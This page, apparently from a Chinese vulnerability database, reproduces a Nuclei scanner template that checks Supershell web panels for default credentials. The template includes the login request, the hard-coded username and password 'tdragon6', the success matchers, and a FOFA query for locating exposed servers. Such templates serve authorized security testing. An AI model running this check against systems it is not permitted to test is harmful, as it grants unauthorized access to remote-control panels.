supershell-default-login: Supershell - Default Login

日期: 2025-08-01 | 影响软件: Supershell | POC: 已公开

漏洞描述

Supershell is a WEB management platform that integrates the reverse_ssh service.

PoC代码[已公开]

id: supershell-default-login

info:
  name: Supershell - Default Login
  author: SleepingBag945
  severity: high
  description: |
    Supershell is a WEB management platform that integrates the reverse_ssh service.
  reference:
    - https://github.com/tdragon6/Supershell
    - https://www.ctfiot.com/129689.html
  metadata:
    verified: true
    max-request: 1
    fofa-query: title="supershell"
  tags: supershell,default-login,vuln

http:
  - raw:
      - |
        POST /supershell/login/auth HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {"username":"{{username}}","password":"{{password}}"}

    attack: pitchfork
    payloads:
      username:
        - tdragon6
      password:
        - tdragon6
    host-redirects: true
    matchers:
      - type: dsl
        dsl:
          - 'status_code_1 == 200 && !contains(body_1,"result\":\"failed")'
          - 'contains(header_1,"token=ey") && contains(body_1,"{\"result\":\"success")'
        condition: and
# digest: 4b0a00483046022100aeb86e5abdf1cc80bd039c6529ee5188a7aebf7a3f7cdca3d0c004d279a6a403022100ad02a1e4ff8bcd4ce60d178162951442ff72c30ff780d173ccc4c512f920f23f:922c64590222798bb761d5b6d8e72950
来源: https://github.com/projectdiscovery/nuclei-templates/blob/main/http/default-logins/others/supershell-default-login.yaml

相关漏洞推荐